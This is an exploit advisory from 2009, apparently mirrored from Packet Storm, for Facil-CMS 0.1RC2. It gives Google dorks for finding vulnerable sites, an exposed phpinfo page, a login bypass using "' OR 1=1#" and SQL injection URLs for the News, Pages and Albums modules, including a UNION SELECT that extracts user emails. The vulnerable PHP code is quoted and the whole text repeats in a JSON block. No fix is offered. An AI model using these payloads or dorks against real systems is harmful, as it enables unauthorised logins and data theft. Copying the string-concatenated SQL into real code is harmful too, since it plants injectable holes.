Search...

Facil-CMS 0.1RC2 SQL Injection

2009-03-19T00:00:00

ID PACKETSTORM:75861
Type packetstorm
Reporter any.zicky
Modified 2009-03-19T00:00:00

Description

                                        
                                            `[Script]  
Facil-CMS 0.1RC2  
  
+download: http://sourceforge.net/project/platformdownload.php?group_id=217673  
  
[DORK]  
inurl:modules.php?modload=News  
Copyright (C) 2008 by FacilCMS.org  
inurl: /facil-cms/  
  
[Author]  
any.zicky  
  
[Contact Me]  
any__dot__zicky__at__gmail__dot__com ;)  
  
[About]  
Facil CMS is a Free and Open Source Project for your site Content Management System (CMS). Facil CMS uses PHP 5 and connect to many database systens. Facil CMS is Easy to create and modify modules for your system and Support Theme Templates.  
  
[Other bug in project]  
http://www.milw0rm.com/exploits/5792  
  
[Bugs]  
1) we can see phpinfo() in root_path project  
  
+Example: http://localhost/phpinfo.php  
  
2) Auth bypass  
  
let's see login.php code  
  
[CODE]  
...  
  
if($_POST['email'] && $_POST['password'])  
{  
...  
$email = $_POST['email'];  
$password = md5($_POST['password']);  
$user = new Users();  
$login = $user-&gt;Login($email, $password); &lt;-------------  
if($login && !is_null($login) && !empty($login))  
{  
$user = new Users($login);  
...  
[/CODE]  
  
then let look /facil-cms/modules/Users/class/Users.mysql.class.php code  
  
[CODE]  
...  
function Login($email, $password)  
{  
$sql = "SELECT * FROM " . _USERS_DB_TABLE_ . " WHERE email='" . $email . "' AND password='" . $password . "'"; &lt;----------  
$res = $GLOBALS['DB']-&gt;Execute($sql) or die($GLOBALS['DB']-&gt;ErrorMsg() . '&lt;br /&gt;' . $sql);  
if($res-&gt;RecordCount() == 1)  
{  
return $res-&gt;fields('id');  
}  
}  
...  
  
[/CODE]  
  
+Example: http://locahost/index.php?modload=User  
  
Email: admin@facilcms.org'#  
pass: blaaaaa  
  
Email: ' OR 1=1#  
pass: blaaaaa  
  
3) SQL-INj in News modules  
  
Let look /facil-cms/modules/News/class/News.mysql.class.php code  
  
[CODE]  
...  
function getNewInfo($id)  
{  
$sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $id; &lt;----------------  
$res = $GLOBALS['DB']-&gt;Execute($sql) or die($GLOBALS['DB']-&gt;ErrorMsg() . '&lt;br /&gt;' . $sql);  
if($res-&gt;RecordCount() == 1)  
{  
$this-&gt;setContent($res-&gt;fields('content'));  
$this-&gt;setDate($res-&gt;fields('date'));  
$this-&gt;setId($res-&gt;fields('id'));  
$this-&gt;setLanguage($res-&gt;fields('language'));  
$this-&gt;setPublisher($res-&gt;fields('publisher'));  
$this-&gt;setResume($res-&gt;fields('resume'));  
$this-&gt;setStatus($res-&gt;fields('status'));  
$this-&gt;setTitle($res-&gt;fields('title'));  
return true;  
}  
}  
...  
[/CODE]  
  
+Example: http://localhost/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1#  
  
4) SQL-Inj in Pages modules  
  
Let look /facil-cms/modules/Pages/class/Pages.mysql.class.php code  
[CODE]  
...  
function getPageInfo($id)  
{  
$sql = "SELECT * FROM " . _PAGES_DB_TABLE_ . " WHERE id=" . $id; &lt;------------------  
$res = $GLOBALS['DB']-&gt;Execute($sql);  
if($res-&gt;RecordCount() == 1)  
{  
$this-&gt;setActive($res-&gt;fields('active'));  
$this-&gt;setContent($res-&gt;fields('content'));  
$this-&gt;setId($res-&gt;fields('id'));  
$this-&gt;setLanguage($res-&gt;fields('language'));  
$this-&gt;setTitle($res-&gt;fields('title'));  
return true;  
}  
}  
  
...  
[/CODE]  
  
+Example: http://localhost/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/*  
  
5) SQL-inj in ALbums module  
  
Let look /facil-cms/modules/Albums/class/Photos.mysql.class.php code  
  
[CODE]  
...  
function getPhotoInfo($id)  
{  
$sql = "SELECT * FROM " . _PHOTOS_DB_TABLE_ . " WHERE id=" . $id; &lt;--------------------  
$res = $GLOBALS['DB']-&gt;Execute($sql) or die($GLOBALS['DB']-&gt;ErrorMsg() . '&lt;br /&gt;' . $sql);  
if($res-&gt;RecordCount() == 1)  
{  
$this-&gt;setId($res-&gt;fields('id'));  
$this-&gt;setAlbum($res-&gt;fields('album'));  
$this-&gt;setFile($res-&gt;fields('file'));  
$this-&gt;setComment($res-&gt;fields('comment'));  
return true;  
}  
}  
...  
[/CODE]  
  
+Example: http://localhost/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/*  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:75861", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Facil-CMS 0.1RC2 SQL Injection", "description": "", "published": "2009-03-19T00:00:00", "modified": "2009-03-19T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/75861/Facil-CMS-0.1RC2-SQL-Injection.html", "reporter": "any.zicky", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:00", "viewCount": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:19:00", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:19:00", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/75861/facilcms-sqldisclose.txt", "sourceData": "`[Script] \nFacil-CMS 0.1RC2 \n \n+download: http://sourceforge.net/project/platformdownload.php?group_id=217673 \n \n[DORK] \ninurl:modules.php?modload=News \nCopyright (C) 2008 by FacilCMS.org \ninurl: /facil-cms/ \n \n[Author] \nany.zicky \n \n[Contact Me] \nany__dot__zicky__at__gmail__dot__com ;) \n \n[About] \nFacil CMS is a Free and Open Source Project for your site Content Management System (CMS). Facil CMS uses PHP 5 and connect to many database systens. Facil CMS is Easy to create and modify modules for your system and Support Theme Templates. \n \n[Other bug in project] \nhttp://www.milw0rm.com/exploits/5792 \n \n[Bugs] \n1) we can see phpinfo() in root_path project \n \n+Example: http://localhost/phpinfo.php \n \n2) Auth bypass \n \nlet's see login.php code \n \n[CODE] \n... \n \nif($_POST['email'] && $_POST['password']) \n{ \n... \n$email = $_POST['email']; \n$password = md5($_POST['password']); \n$user = new Users(); \n$login = $user->Login($email, $password); <------------- \nif($login && !is_null($login) && !empty($login)) \n{ \n$user = new Users($login); \n... \n[/CODE] \n \nthen let look /facil-cms/modules/Users/class/Users.mysql.class.php code \n \n[CODE] \n... \nfunction Login($email, $password) \n{ \n$sql = \"SELECT * FROM \" . _USERS_DB_TABLE_ . \" WHERE email='\" . $email . \"' AND password='\" . $password . \"'\"; <---------- \n$res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); \nif($res->RecordCount() == 1) \n{ \nreturn $res->fields('id'); \n} \n} \n... \n \n[/CODE] \n \n+Example: http://locahost/index.php?modload=User \n \nEmail: admin@facilcms.org'# \npass: blaaaaa \n \nEmail: ' OR 1=1# \npass: blaaaaa \n \n3) SQL-INj in News modules \n \nLet look /facil-cms/modules/News/class/News.mysql.class.php code \n \n[CODE] \n... \nfunction getNewInfo($id) \n{ \n$sql = \"SELECT * FROM \" . _NEWS_DB_TABLE_ . \" WHERE id=\" . $id; <---------------- \n$res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); \nif($res->RecordCount() == 1) \n{ \n$this->setContent($res->fields('content')); \n$this->setDate($res->fields('date')); \n$this->setId($res->fields('id')); \n$this->setLanguage($res->fields('language')); \n$this->setPublisher($res->fields('publisher')); \n$this->setResume($res->fields('resume')); \n$this->setStatus($res->fields('status')); \n$this->setTitle($res->fields('title')); \nreturn true; \n} \n} \n... \n[/CODE] \n \n+Example: http://localhost/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1# \n \n4) SQL-Inj in Pages modules \n \nLet look /facil-cms/modules/Pages/class/Pages.mysql.class.php code \n[CODE] \n... \nfunction getPageInfo($id) \n{ \n$sql = \"SELECT * FROM \" . _PAGES_DB_TABLE_ . \" WHERE id=\" . $id; <------------------ \n$res = $GLOBALS['DB']->Execute($sql); \nif($res->RecordCount() == 1) \n{ \n$this->setActive($res->fields('active')); \n$this->setContent($res->fields('content')); \n$this->setId($res->fields('id')); \n$this->setLanguage($res->fields('language')); \n$this->setTitle($res->fields('title')); \nreturn true; \n} \n} \n \n... \n[/CODE] \n \n+Example: http://localhost/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/* \n \n5) SQL-inj in ALbums module \n \nLet look /facil-cms/modules/Albums/class/Photos.mysql.class.php code \n \n[CODE] \n... \nfunction getPhotoInfo($id) \n{ \n$sql = \"SELECT * FROM \" . _PHOTOS_DB_TABLE_ . \" WHERE id=\" . $id; <-------------------- \n$res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); \nif($res->RecordCount() == 1) \n{ \n$this->setId($res->fields('id')); \n$this->setAlbum($res->fields('album')); \n$this->setFile($res->fields('file')); \n$this->setComment($res->fields('comment')); \nreturn true; \n} \n} \n... \n[/CODE] \n \n+Example: http://localhost/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/* \n \n`\n"}